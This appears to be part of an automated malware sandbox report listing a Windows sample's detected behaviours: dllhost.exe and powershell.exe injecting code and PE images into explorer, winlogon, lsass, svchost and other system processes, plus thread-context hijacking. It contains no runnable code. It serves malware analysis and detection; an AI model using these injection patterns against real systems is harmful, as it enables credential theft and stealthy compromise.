Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 192913B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 139F96A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C3D1EA0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 1028 base: 3310000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 1028 base: 9850000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3160	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 5068	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 1188
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 4668

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: C68B738010	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CD30000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCA0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 11BA702010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CB60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5E060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DCD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000
